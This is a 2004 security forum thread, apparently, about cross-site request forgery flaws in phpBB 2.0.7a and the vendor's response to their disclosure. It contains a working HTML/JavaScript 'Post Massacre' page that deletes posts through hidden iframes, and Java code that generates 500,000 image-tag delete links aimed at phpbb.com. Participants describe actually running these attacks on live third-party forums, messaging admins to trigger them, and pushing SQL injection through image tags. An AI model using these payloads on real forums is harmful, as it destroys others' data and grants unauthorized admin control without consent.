I have decided to release some proof of concept exploit examples. The ones of you who know me are probably familiar with the fact GulfTech keeps exploit code and the like private in almost all cases and only shares it with known security researchers, but I feel this is the only way to make misinformed people believers. It's unfortunate, but I will limit the examples to deleting posts and not performing admin actions as my purpose is to not have anyone do any real harm to someones forum.
If anyone wants to give thier opinion we would love to hear it as long as it is appropriate and not a flame or something unnecessary. We only want civilized discussion about this issue and a proposed fix
Best Regards,
JeiAr GulfTech Security Research
Niekos
Mar 23 2004, 08:10 PM
QUOTE (JeiAr @ Mar 23 2004, 07:39 PM)
Since the phpBB team do not seem to think the issues I found as outlined here are serious issues.
jeiAr GulfTech Security Research
Why are they so stupid? You cant take these guys serious. Thx for al the info man. You are doing a great job.
aapje
Mar 23 2004, 08:20 PM
wow, they are really stupid, i tried it and it works fine, i guess you can also trick to give a certain user admin rights.... or delete a whole forum...
JeiAr
Mar 23 2004, 08:22 PM
Thanks To know I am helping someone makes it all worth while.
I don't think they are stupid, as they have always handled things good before. I am hoping it is just a misunderstanding. But then they resort to this?!?
QUOTE
I should add that I did not give permission for the original reporter to disclose my email conversations with him ... I could have persued that if I'd wished. However I decided it may help explain the situation and thus let it go.
1) Giving them advanced warning and waiting for a reply before going public.
2) Even honoring the guys wishes as seen here
QUOTE
> I don't mean this to sound like we don't want to do anything, it's just that there is no great need to in 2.0. So please, > should you chose to release anything detailing "security problems" please be sure to emphasise the underlying issue as to > why they are of very little concern.
---------------
I will release details of this email and try and show things from all points of view. I just want to help people, not frighten them or make them think phpBB is insecure. After all we use phpBB for the GulfTech forums
3) Fixing all of the issues except the Session ID auth issues myself when I work two jobs and rarely have any real time for myself.
JeiAr
Mar 23 2004, 08:27 PM
QUOTE (aapje @ Mar 23 2004, 08:20 PM)
wow, they are really stupid, i tried it and it works fine, i guess you can also trick to give a certain user admin rights.... or delete a whole forum...
I encourage people to explore the possibilities of these vulns, but I know for a fact that anything called via modcp.php doesnt work.
and so on... and they can say goodbye to all the posts if they didnt make a recent backup....
guess you can use topics to delete to havent tried that
JeiAr
Mar 23 2004, 08:30 PM
Yeah man, you can delete topics by deleting all the posts in that topic. It is a little tedious but works just as well as the topic delete function in the modcp. Here is an example.
also, i tried the same for topic, t=..., but then i still get the confirmation so guess that wont work
JeiAr
Mar 23 2004, 08:37 PM
And you can be slick about it to. Make a post with a certain number of posts to be deleted, make an img to delete the post with the malicious requests in it, then make an image that logs out the user/mod/admin
It's a wham bam thank you maam kinda post
JeiAr
Mar 23 2004, 08:42 PM
And this issue is still present on the phpbb.com forums too. I just deleted one of my posts by simply visiting a url
aapje
Mar 23 2004, 08:48 PM
maybe they learn if you...
make a big list of topics from 1 - 1000 in an image
i'll try to make something to automate it
JeiAr
Mar 24 2004, 09:50 AM
QUOTE (aapje @ Mar 23 2004, 08:48 PM)
maybe they learn if you...
make a big list of topics from 1 - 1000 in an image
i'll try to make something to automate it
lol That would definately wake me up
migo
Mar 24 2004, 01:24 PM
what stupids they are!!!!! yo man offered them help in their buggy scripts and the'y are aragons to listen
for me i tested something else in a board and guess what i can promote a normal user account to and Admin account!!!!!!!!!!
same ideas as jeiar did!!! u can do anything with this serious risk
good work Jeiar, i'll go learn in deep PHP scripting, cause php scripts is full of hunts because of developers errors and no sanitizations to properly filter people inputs
nice work m8 once again
Best Regards migo
aapje
Mar 24 2004, 05:54 PM
QUOTE (JeiAr @ Mar 24 2004, 09:50 AM)
QUOTE (aapje @ Mar 23 2004, 08:48 PM)
maybe they learn if you...
make a big list of topics from 1 - 1000 in an image
i'll try to make something to automate it
lol That would definately wake me up
well, i made a javascript, just replace the 500000 with how many links you want...
I doesnt take long, make a file in the same dir called list.txt, compile & run the code and you got 500000 links in the textfile... paste it in an post and voila
CODE
import java.io.*;
public class Main {
public static void main(String[] args) {
try { PrintWriter out = new PrintWriter( new FileWriter("list.txt"));
for (int i = 0; i < 500000; i++) { out.println("[img]http://www.phpbb.com/phpBB/posting.php?mode=delete&p=" + i + "&confirm=yes[/img]");
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title>phpBB 2.0.7a && Earlier Post Massacre</title>
<script language=JavaScript>
var s = 100; /* The P Num To Start With */ var e = 250; /* The P Num To End With */ var u = "http://localhost/forum"; /* The Path To phpBB Forum */
/* This Function Just Increments The Post Count, But If An Attacker Wanted To They Could Write An Array To Delete All Of Your Stickys Announcments Or Any Other Posts They Didn't Like. And To Ensure Effectiveness All An Attacker Would Have To Do Is Send The Site Admin A PM With A Link To A Version Of This Script That Loads The Function Immeadiately And They Would Be Whit Out Of Luck // JeiAr */
function DoTheDamnThang() { while (s < e) { document.write ('<iframe width="0" height="0" src="' + u + '/posting.php?mode=delete&p=' + s + '&confirm=yes"></iframe>'); s++; } } </script>
</head>
<body>
<table width="100%" border="0" cellspacing="1" cellpadding="1">
<tr>
<td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br />
<a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/>
<a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/>
<a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/>
<a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p>
</td>
<td width="85%" align="left" valign="top"> <center> <p align="center"> This Is A Proof Of Concept Script To Show The Dangers Of The Vulnerabilities Discovered Recently By GulfTech Security Research Which The phpBB Team Initially Wrote Off As Not Being A Risk. This Script Could Also Be Loaded With Admin Commands To Execute, Hex Encoded SQL Queries To Run Via The Vulns In The ACP, And More. Do Not Mess With This Script If You Do Not Know What You Are Doing. </p> <form method="post"> <input type="submit" value=" Do The Damn Thang! " onclick="DoTheDamnThang();"> </form> </center> </body> </html>
aapje
Mar 24 2004, 07:24 PM
hehe, should i post on phpbb with 1000000 img links?
JeiAr
Mar 24 2004, 07:45 PM
I do not think I am ever giving phpBB advanced warning with holes EVER again. And I wouldn't blame other people not too also.
QUOTE ("JeiAr")
I have seen numerous times Paul and other developers getting upset because people make vulns public with out contacting them. They are 100% valid in this and I agree with them, But when I come here and see stuff like this.
QUOTE
Draegonis Moderator Team Member
Joined: 22 Apr 2002 Posts: 4124 Location: Timbucktwo Posted: Wed Mar 24, 2004 10:59 am Post subject:
I think the developers will implement a solution that they see fit, when they see fit. It's getting slightly tiring seeing 3rd parties thinking they know more about phpBB than those who wrote it. Locked, for now.
It makes me, and I am sure other security researchers feel like we are wasting our time. The vulnerabilities I and other researchers have found are of nothing but help the the phpBB community as a whole. Not only do I find some substantial holes, but I take time out of MY free time to try and help this "community" and get grief for it.
Why call it the "phpBB community" if someone not a developer having a say in it is a bad thing? I will bet money that in the future we will probably see more holes in phpBB being released un-announced. I seriously doubt I will ever try and help the phpBB community out again. This is unbelievable.
Just look at the shit going down on hxxp://www.phpbb.com/phpBB/viewforum.php?f=18
JeiAr
Mar 24 2004, 08:40 PM
You can also delete styles, smilies, word censors, ranks and probably more in the ACP via the malicious image method
And also you can use the SQL Injections in the admin panel too via an image tag.
Just hex encode the SQL to be executed, place it in am image tag and it's done. You can also have post method stuff executed but that will require getting an admin to visit a page you set up to submit the request when he visits it. It works but takes a little more social engineering
aapje
Mar 24 2004, 08:43 PM
haha, i'll post a topic which deletes 1100000 (that is all) the posts...
But i have to wait till there is an admin otherwise the mods visit it first and then only the posts they can mod will be removed...
/edit: whee i put 1100000 links in the field, when i press submit ie crashes...
hehe im pm-ing the admin right now, but copieng 1000000 lines is not fast and ie and mozilla cannot take it
btw, about phpnuke.... it uses converted phpBB version... this should also work on that, and there maybe you can do even more in the phpnuke menu
JeiAr
Mar 24 2004, 08:49 PM
QUOTE (aapje @ Mar 24 2004, 08:43 PM)
But i have to wait till there is an admin otherwise the mods visit it first and then only the posts they can mod will be removed...
PM the admin. You can put these malicious "images" in PM's That way ONLY a logged in admin will view it and it will still execute the same
JeiAr
Mar 24 2004, 08:51 PM
I think they are working on patches as we speak, and GulfTech has already released patches, so if anyone wants to have any "fun" with this issue they better do it quick
aapje
Mar 24 2004, 09:14 PM
//you read my modified post about nuke?
It seems i cant use more then 300000 lines, else ie crashes, so i am now pm-ing to delete the last 300000 messages , but it takes some time as it is like 25 mb...
tonight i'll look at phpnuke
/i'm gone for tonight, it is still sending the pm so i'll look later at it tonight
bye
JeiAr
Mar 25 2004, 10:46 AM
Ya know, I was thinking about something. Lets say a board has 10,000 posts, and five admins. If you sent each admin 2,000 image links in a private message each you could wipe out the entire board. In alot of cases they would be so confused by seeing 2,000 broken images in thier PM that they would probably watch it long enough for most and maybe all 2,000 delete requests to be executed.
JeiAr
Mar 25 2004, 12:13 PM
Well, I think i got most things secured on the GulfTech Forums with the exception of the ACP issues which is gonna require a good bit of work as there is NO session checking implemented there so it seems, and just transferring the modcp session auth over doesn't seem to wok sooooo
Interesting. Gives new meaning to the expresion a picture is worth a thousand words
Also, i seem to have fixed all of the phpBB vulns on the gulftech forums. I updated the files in the .rar files so you can try them if you like
aapje
Mar 25 2004, 06:37 PM
haha, i thought it woulld work on nuke too, thanks, i'll try to add me as a author on phpnuke.org i'll give feedback
JeiAr
Mar 25 2004, 07:00 PM
Well, phpBB 2.0.8 was released today, but my exploit code still works as they only changed [img] tags to be a valid extension
aapje
Mar 25 2004, 07:40 PM
i saw on nukecops.com that they already fixed it, but they only fix so that you cant get god mode, so you can still delete, activate modules etc etc etc. They just edited the Author& aid line so you have to confirm
Niekos
Mar 25 2004, 07:50 PM
Hehe I tested with this. Damn this exploit works good. It's a very nice one. And it's a bit of fun .
JeiAr
Mar 25 2004, 08:12 PM
the iframe width=0 and height=0 seems to make it faster and less suspicious. You could also make that exploit more dangerous by putting it hidden in a legitimate looking web page or my hiding it in a frameset etc But yeah, the phpBBpostMassacre still works even on phpBB 2.0.8
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
and they can say goodbye to all the posts if they didnt make a recent backup....
